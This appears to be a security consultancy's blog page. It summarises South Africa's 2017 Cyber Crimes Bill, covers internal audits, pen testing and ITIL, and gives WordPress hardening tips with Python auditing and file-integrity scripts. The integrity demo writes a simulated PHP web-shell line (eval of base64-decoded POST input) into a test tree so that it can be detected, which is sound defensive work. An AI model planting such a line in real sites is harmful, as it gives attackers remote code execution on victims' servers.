Cyber security

2017 Cyber Crimes and Cyber Security Bill in a Nutshell

Broad, overreaching laws, like sweeping statements, are dangerous. The Cyber Crimes and Cyber Security Bill of 2017, recently published by the Department of Justice, is one-sided legislation, and we foresee numerous amendments being made before it is truly effective.

‘SABRIC states that SA loses R2.2 billion to Internet fraud and phishing attacks annually. The Bill creates new crimes and offences. It makes compliance with information security and requirements pertaining to Protection of Personal Information (“POPI”) even more complex. When enacted, this law will have far-reaching implications for individuals and organisations, particularly those that process data, as well as for banks or electronic communications service providers.’ – Cliffe Dekker Hofmeyr Attorneys.

This is what you need to know


1. Your security tools could implicate you – whether you use them for work or not.

Unlawful acts in respect of software or hardware tool – section 4 of the Bill.

(1) Any person who unlawfully and intentionally possesses, manufactures, assembles, obtains, sells, purchases, makes available or advertises any software or hardware tool for purposes of contravening the provisions of section 2(1), 3(1), 5(1), 6(1) or 7(1)(a) or (d), is guilty of an offence.

(2) Any person who unlawfully and intentionally uses any software or hardware tool for purposes of contravening the provisions of section 2(1), 3(1), 5(1), 6(1) or 7(1)(a) or (d), is guilty of an offence.

(3) For purposes of this section, ‘‘software or hardware tool’’ means any electronic, mechanical or other instrument, device, equipment, apparatus or a substantial component of such a device or a computer program, which is designed or adapted primarily for the purposes of—
(a) securing access as contemplated in section 2(1);
(b) acquiring data as contemplated in section 3(1);
(c) interfering with data or a computer program as contemplated in section 5(1);
(d) interfering with a computer data storage medium or a computer system as contemplated in section 6(1); or
(e) acquiring, modifying, providing, making available, copying, using or cloning a password, access code or similar data or devices as defined in section 7(3).

Note: the section provides no express exemption for legitimate possession, such as a penetration tester's scanners and password crackers, a researcher's proof-of-concept code or an administrator's packet sniffer. Its only safeguard is the wording ‘unlawfully and intentionally … for purposes of contravening’ the access, interception and interference offences in sections 2, 3, 5, 6 and 7, so the purpose for which a dual-use tool is held becomes the question a court will ask, and it is the practitioner who will be asked it. Anyone who keeps such tools for work should be able to show that purpose: written authorisation, a defined scope and an engagement letter for every assessment in which they are used.

Read: Cyber Crimes Bill still makes criminals of most of us.


2. Expedited Search Warrants are a thing

Scarily, the Bill lets police shortcut the usual formalities of obtaining a search warrant: a specifically designated police official may apply orally, rather than in writing, where urgency or exceptional circumstances make a written application impractical:

Oral application for search warrant or amendment of warrant – section 28.

(1) An application referred to in section 27(1)(a), or an application for the amendment of a warrant issued in terms of section 27(1)(a), may be made orally by a specifically designated police official, if it is not reasonably practicable, having regard to the urgency of the case or the existence of exceptional circumstances, to make a written application.

3. The Law Extends to Posting Images

A further worry is this section, which makes distributing an intimate image of an identifiable person without their consent a crime. That seems reasonable to the ordinary you and me, but consider the restriction it places on the press when reporting on high-profile individuals.

Distribution of data message of intimate image without consent – section 18.

(1) Any person who unlawfully and intentionally makes available, broadcasts or distributes, by means of a computer system, a data message of an intimate image of an identifiable person knowing that the person depicted in the image did not give his or her consent to the making available, broadcasting or distribution of the data message, is guilty of an offence.

(2) For purposes of subsection (1), ‘‘intimate image’’ means a visual depiction of a person made by any means— (a) under circumstances that give rise to a reasonable expectation of privacy; and (b) in which the person is nude, is exposing his or her genital organs or anal region or, in the case of a female, her breasts.

4. Banks and Cellphone Companies have to Report Offences involving their Systems within 72 Hours

This is not a general data-breach notification duty of the POPI kind: the trigger is the provider's own computer system being involved in the commission of a Chapter 2 offence of a category or class determined in terms of subsection (2), and the report goes to the South African Police Service, not to affected customers.

Obligations of electronic communications service providers and financial institutions – section 52.

(1) An electronic communications service provider or financial institution that is aware or becomes aware that its computer system is involved in the commission of any category or class of offences provided for in Chapter 2 and which is determined in terms of subsection (2), must— (a) without undue delay and, where feasible, not later than 72 hours after having become aware of the offence, report the offence in the prescribed form and manner to the South African Police Service.

5. There are New Crimes Created by the Law

  • cyber fraud
  • cyber forgery
  • cyber uttering


6. New Structures come into Play

There are new structures, all aimed at developing capacity to detect, prevent, apprehend and investigate cyber criminals.

  • 24/7 Point of Contact will render assistance with cyber crime incidents
  • Cyber Response Committee to implement policy
  • Computer Security Incident Response Team will facilitate co-operation with the private sector and facilitate the co-ordination and distribution of incident information

If enacted in its current form, the legislation will certainly have implications for industry professionals, and for how it interacts with the RICA and POPI laws; what those implications will be remains to be seen.

Do you have questions regarding the Bill? Email: engage@ongers.com

OIC is an Information Security Firm based in Cape Town. We assist medium to large enterprises with all aspects of information security. Contact us: engage@ongers.com

Internal Security Audits 101

Auditing information security covers everything from the physical security of data centres to the logical security of databases. Add to that the fact that each business is different, with its own challenges and its own objectives for the value it hopes to gain from an internal security audit.

A security audit is a systematic evaluation of the security of a company’s information system by measuring how well it conforms to a set of established criteria. A thorough audit typically assesses the security of the system’s physical configuration and environment, software, information handling processes, and user practices. Security audits are often used to determine regulatory compliance. – Techopedia


While the business value of an effective audit is not in question, the proposal of an audit is often met with resistance: the Information Systems (IS) department versus the auditor. The perception on the IS side is that they are being policed, or deliberately set up to be caught with their proverbial pants down. The result? Digital hide-and-seek between two departments that should be complementing each other's roles and objectives. Communicating the specific objective, playing open cards and sharing insight into the systems in question eliminates this conflict from the start.

There is no one-size fits all security audit


While it is important that your company has an internal security policy covering all aspects of information security, an audit should focus on the one or two areas that will have the biggest impact on the business. It could be a combination of any of the following areas:

  • Information Security (general)
  • Business Continuity Management
  • Mobile
  • Cloud
  • IT Risk Management
  • Programme Risk
  • Software / IT Asset Management
  • Social Media Risk Management
  • Segregation of duties / Identity and access management
  • Data loss prevention and privacy

“Effective risk management is the product of multiple layers of risk defense. Internal Audit should support the board’s need to understand the effectiveness of cybersecurity controls.”  – Deloitte.


Six Key Benefits


  • Improve the “control environment” of the organisation
  • Ensure that the organisation is process-dependent instead of person-dependent
  • Identify redundancies in operational and control procedures and provide recommendations to improve the efficiency and effectiveness of those procedures
  • Serve as an early warning system, enabling deficiencies to be identified and remediated on a timely basis (i.e. prior to external, regulatory or compliance audits)
  • Ultimately increase accountability within the organisation
  • Give management an advocate, a risk manager, a controls expert, an efficiency specialist, a problem-solving partner and a safety net


Are you considering an internal security audit?


OIC is a security consulting firm based in Cape Town. We get excited about challenging security issues and are ready to provide real solutions to securing your company’s most valuable assets:  your people, processes and technology. Contact us: engage@ongers.com


Source credits:

https://partners-network.com

https://chapters.theiia.org/Orange%20County/IIA%20OC%20Presentation%20Downloads/2015-08-%20Cyber%20IA.pdf

http://www.ey.com/Publication/vwLUAssets/Ten_key_IT_considerations_for_internal_audit/$FILE/Ten_key_IT_considerations_for_internal_audit.pdf


What is the Value of a Penetration Test?

This excerpt from Forbes.com explains the value of a pen test.

Here are a few of the reasons organizations invest in penetration testing:

  • Determining the feasibility of a particular set of attack vectors
  • Identifying higher-risk vulnerabilities that result from a combination of lower-risk vulnerabilities exploited in a particular sequence
  • Identifying vulnerabilities that may be difficult or impossible to detect with automated network or application vulnerability scanning software
  • Assessing the magnitude of potential business and operational impacts of successful attacks
  • Testing the ability of network defenders to successfully detect and respond to the attacks
  • Providing evidence to support increased investments in security personnel and technology to C-level management, investors, and customers
  • Meeting compliance requirements (for example, the Payment Card Industry Data Security Standard (PCI DSS) requires both annual and ongoing penetration testing, after any system changes)
  • Post security incident, an organization needs to determine the vectors that were used to gain access to a compromised system (or entire network). Combined with forensic analysis, a penetration test is often used to re-create the attack chain, or else to validate that new security controls put in place will thwart a similar attack in the future.

OIC offers a range of security related services, including pen testing. Read more here.

Full original article here.


ITIL will change your service management for the better

ITIL is intentionally composed of a common sense approach to service management – do what works.

And what works is adapting a common framework of practices that unite all areas of IT service provision toward a single aim – delivering value to the business.

The following list defines the key characteristics of ITIL that contribute to its global success:

  • Non-proprietary – ITIL service management practices are applicable in any IT organization because they are not based on any particular technology platform, or industry type. ITIL is owned by the UK government and not tied to any commercial proprietary practice or solution
  • Non-prescriptive – ITIL offers robust, mature and time-tested practices that have applicability to all types of service organizations. It continues to be useful and relevant in public and private sectors, internal and external service providers, small, medium and large enterprise, and within any technical environment
  • Best practice – ITIL service management practices represent the learning experiences and thought leadership of the world’s best in class service providers
  • Good practice – Not every practice in ITIL can be considered ‘best practice’, and for good reason. For many, a blend of common, good and best practices are what give meaning and achievability to ITSM. In some respects, best practices are the flavour of the day. All best practices become common practices over time, being replaced by new best practices.

OIC offers ITIL training for small groups, from Foundation level. Read more here.

Source credit: myITstudy.com


5 Tips for securing your digital assets

A great article by flyplugins.com, especially for companies who use WordPress.

Tip #1 – Start with a secure foundation

When it comes to security, you want to start with a secure foundation. That secure foundation is your computer or laptop. If your computer or laptop is compromised, then securing WordPress might be the least of your worries as a hacker may have entry to your financial accounts, email accounts, etc.

Make sure you use a strong password for the login on your machine. Otherwise none of this matters.

There are sites on the internet that can create complex passwords at random. They are more difficult to memorize, but please stay away from using common passwords like “password” or “password123”. Also, please don’t keep a text file or spreadsheet on your computer or even a sticky note on your laptop that has all your passwords (yes, this actually happens). If you have tons of passwords to remember, use an application like LastPass (free) to help organize all those user accounts and passwords.

Physical security is also a big deal, especially if you use a laptop. Make sure it’s always stored in a safe location. Laptops are prime targets for hackers because they are so easy to grab and go. Your laptop has lots of information that hackers would love to get their hands on.

Make sure you are using an anti-virus program on your computer. There are free anti-virus programs that are just as good as the expensive ones that require a yearly subscription. However, the important thing is to have some protection on your computer. Make sure your virus definitions update on a daily basis.

If you want to take this a step further, you can also install a firewall program on your computer. Sometimes the anti-virus application may have a built-in firewall, however, at minimum have an anti-virus program.

Before you jump on a wifi connection, make sure you can trust it. Hackers can setup wireless routers with “free wifi” and once connected, they can sniff all the data transmitted through the router. If possible, use a VPN connection or make sure you don’t access sensitive information on the internet when on public wifi.

Tip #2 – Get on a secure web hosting service

We are currently hosted on WP Engine which has excellent server level security. Not only that, but since they are a WordPress only hosting company, they take WordPress seriously. In fact, they have a “plugin blacklist” which outlines plugins that can’t be used on sites hosted on WP Engine. Those plugins are not necessarily bad, but they may contain vulnerabilities or run inefficiently which affects server speed. WP Engine may not suit everyone’s needs, however, the point is to make sure you research the level of security that your hosting company provides.

Another great hosting option comes from our good friends at Pagely. Pagely also offers excellent security methods to protect their customer websites.

Tip #3 – Setup WordPress right from the get go

This could probably be a blog post in and of itself, however, I will just hit a few major points.

  • Don’t use “admin” as the primary administrator account
  • Don’t begin your database table names with ‘wp_’
  • As always, use strong passwords for the admin account(s)
  • Consider using two-factor authentication

There are tons of articles available that can help you harden your WordPress site.
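The points above (together with Tip #1's advice to generate passwords at random) can be turned into a script rather than checked by eye. The following Python is an added example written for this page, not code from flyplugins.com or from WordPress itself: it parses a constructed wp-config.php fragment and a constructed user list, reports the weak settings the tips warn about, and generates a CSPRNG-backed replacement table prefix and password. The sample config, the user list, the common-password list and the 60-bit threshold are all assumptions made for the example; two-factor authentication cannot be seen from the config, so it is not checked.

```python
"""Audit a WordPress setup for the weak defaults in Tips #1 and #3.

Added example (not from flyplugins.com or WordPress). All input below is constructed.
"""
import math
import re
import secrets
import string

# Constructed wp-config.php fragment showing the defaults the tips warn about.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'password123');
$table_prefix = 'wp_';
"""

# Constructed user list as (login, role); on a real site export it with `wp user list`.
SAMPLE_USERS = [("admin", "administrator"), ("jane", "editor")]

# A few of the passwords the tip says never to use (assumed short list; extend it).
COMMON_PASSWORDS = {"password", "password123", "admin", "123456", "letmein"}

# Symbols that are safe to paste inside PHP single quotes (no quote or backslash).
SAFE_SYMBOLS = "!#$%&()*+,-./:;<=>?@[]^_{|}~"


def parse_wp_config(text):
    """Extract define('KEY', 'value') constants and $table_prefix from a wp-config.php."""
    cfg = {}
    for m in re.finditer(r"define\(\s*'([A-Z_]+)'\s*,\s*'([^']*)'\s*\)", text):
        cfg[m.group(1)] = m.group(2)
    m = re.search(r"\$table_prefix\s*=\s*'([^']*)'", text)
    if m:
        cfg["table_prefix"] = m.group(1)
    return cfg


def password_entropy_bits(pw):
    """Rough strength estimate: length * log2(size of the character classes used)."""
    pool = 0
    if any(c.islower() for c in pw):
        pool += 26
    if any(c.isupper() for c in pw):
        pool += 26
    if any(c.isdigit() for c in pw):
        pool += 10
    if any(c in string.punctuation for c in pw):
        pool += len(string.punctuation)
    return len(pw) * math.log2(pool) if pool else 0.0


def audit(config_text, users, min_bits=60):
    """Return a list of findings; an empty list means every check passed."""
    cfg = parse_wp_config(config_text)
    findings = []
    if cfg.get("table_prefix", "wp_") == "wp_":
        findings.append("table prefix is the default 'wp_'")
    pw = cfg.get("DB_PASSWORD", "")
    if pw.lower() in COMMON_PASSWORDS or password_entropy_bits(pw) < min_bits:
        findings.append("DB_PASSWORD is a common or low-entropy password")
    for login, role in users:
        if role == "administrator" and login.lower() == "admin":
            findings.append("administrator account uses the login 'admin'")
    return findings


def strong_password(length=24):
    """Random password from the CSPRNG (secrets, never random) with every class present."""
    alphabet = string.ascii_letters + string.digits + SAFE_SYMBOLS
    while True:
        pw = "".join(secrets.choice(alphabet) for _ in range(length))
        if (any(c.islower() for c in pw) and any(c.isupper() for c in pw)
                and any(c.isdigit() for c in pw) and any(c in SAFE_SYMBOLS for c in pw)):
            return pw


def random_table_prefix(length=5):
    """Random prefix such as 'k3x9q_' for $table_prefix; starts with a letter."""
    chars = string.ascii_lowercase + string.digits
    body = "".join(secrets.choice(chars) for _ in range(length - 1))
    return secrets.choice(string.ascii_lowercase) + body + "_"


if __name__ == "__main__":
    for finding in audit(SAMPLE_WP_CONFIG, SAMPLE_USERS):
        print("FINDING:", finding)
    print("replacement prefix  :", random_table_prefix())
    print("replacement password:", strong_password())
```

Run it against a real install by reading wp-config.php into audit() and exporting the users with `wp user list` or a query on the users table. The entropy figure is a rough class-based estimate, not a dictionary attack, which is why the common-password list is checked separately; and changing the prefix on a live site means renaming the tables and the prefixed option and usermeta keys, so do it on a staging copy first.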

Tip #4 – Stay updated and keep the trash out

When you look at your plugin list, do you notice that there are a lot of updates available? Don’t be that guy! These are not always just new features…they could potentially have security updates rolled into the latest version. It’s absolutely critical to keep WordPress up to date as well as your themes and plugins. I know some individuals are reluctant to update because they are afraid to break their site. I get it. However, most people don’t use test sites to test their themes and plugins.

Since we use WP Engine, each one of our sites has a staging site so we can test any updates before rolling them out on our production site. If you don’t have a staging site, it would be worthwhile to get one even if it’s just a subdomain of your current site. You could even set up a local development environment on your computer using MAMP (Apple) or WAMP (Windows) which includes the entire development stack.

Another tip to remember is to only install plugins you trust. The plugins available on WordPress.org are typically pretty safe. They do have code reviewers looking at plugins, however, it’s only on the initial plugin submission. Just use caution with free plugins. Be sure to look at the reviews, the support topics, and the download count as they can be indicators as to whether the plugin is good or not.

A very important tip to follow is NEVER download a premium plugin for “free”. There are many sites out there slinging premium plugins for free, however, they are not safe. The plugins could contain malware and essentially you will end up with an infected website. Not to mention, it’s stealing! Most premium plugins will only provide support if the plugin purchase was legit.

Tip #5 – Secure the goods

Any time I spin up a WordPress site, one of the first plugins that gets installed is Sucuri. Sucuri is a free plugin which performs security monitoring, malware detection, and contains tools to harden your WordPress website.

If you’ve ever typed in the URL to your website only to find the “red screen of death”, then you know what it feels like to be hacked.

Believe it or not, I’ve had this happen to me and it’s no fun trying to figure out where in the world the malware has been added into your site. In fact, you could spend hours on end replacing plugins, WordPress core files, and theme files only to get re-infected.

Sucuri’s scan feature will find malware in a matter of minutes. Then you can begin the process of cleaning your site, changing passwords and hardening your site.

Here is a list of Sucuri’s primary features:

  • Security Activity Auditing
  • File Integrity Monitoring
  • Remote Malware Scanning
  • Blacklist Monitoring
  • Effective Security Hardening
  • Post-Hack Security Actions
  • Security Notifications
  • Website Firewall (cloud based firewall add-on which requires a subscription)

When you first install the plugin, it’s a little overwhelming, however, the first thing you may want to do is scan your site for malware. Go through each option carefully and configure the plugin to meet your needs as it will be well worth the time investment.
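“File Integrity Monitoring” in the list above is the feature that answers the earlier problem of not knowing where in the site the malware has been added: hash every file on a known-clean install, keep the hashes somewhere the web server cannot write, and diff later snapshots against them. The Python below is an added example by the editor, not Sucuri's code: it baselines a constructed miniature WordPress tree with SHA-256, simulates a compromise (a PHP file dropped in uploads, an eval() injected into a core file, a legitimate file deleted) and classifies the differences. The directory layout, the file contents and the JSON baseline file are assumptions made for the demo.

```python
"""Minimal file-integrity monitor: baseline a tree with SHA-256, then diff it.

Added example (not Sucuri's code). The tree built in demo() is constructed.
"""
import hashlib
import json
import os
import tempfile


def hash_file(path, chunk=65536):
    """SHA-256 of a file, read in chunks so large uploads never sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def baseline(root):
    """Map relative path -> sha256 for every regular file under root."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            snap[rel] = hash_file(full)
    return snap


def diff(old, new):
    """Classify the changes between two snapshots as added / removed / modified paths."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def save_snapshot(snap, path):
    """Persist the baseline; keep it off the web root so a site compromise cannot edit it."""
    with open(path, "w") as f:
        json.dump(snap, f, indent=1, sort_keys=True)


def load_snapshot(path):
    with open(path) as f:
        return json.load(f)


def _write(root, rel, content):
    """Helper for the constructed demo tree."""
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as f:
        f.write(content)


def demo():
    """Constructed scenario: a clean install is baselined, then tampered with."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        _write(root, "index.php", "<?php require 'wp-blog-header.php';\n")
        _write(root, "wp-includes/functions.php", "<?php // core functions\n")
        _write(root, "wp-content/uploads/photo.jpg", "constructed jpeg bytes")
        snap_path = os.path.join(store, "baseline.json")
        save_snapshot(baseline(root), snap_path)

        # Simulated compromise: a PHP dropper in uploads (a media-only directory),
        # an eval() appended to a core file, and a legitimate file removed.
        _write(root, "wp-content/uploads/.cache.php",
               "<?php eval(base64_decode($_POST['c']));\n")
        _write(root, "wp-includes/functions.php",
               "<?php // core functions\neval(base64_decode('...'));\n")
        os.remove(os.path.join(root, "wp-content", "uploads", "photo.jpg"))

        return diff(load_snapshot(snap_path), baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        for p in paths:
            print(f"{kind:9s} {p}")
```

On a real site, run baseline() over the document root immediately after a clean install or update, save the snapshot off the web root, and compare on a schedule or after any incident. A modified core or plugin file is the fastest way to find the injection point that the tip describes spending hours hunting for, and any .php file that appears under wp-content/uploads deserves immediate attention, since that directory should only ever hold media.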

Full article source at flyplugins.com.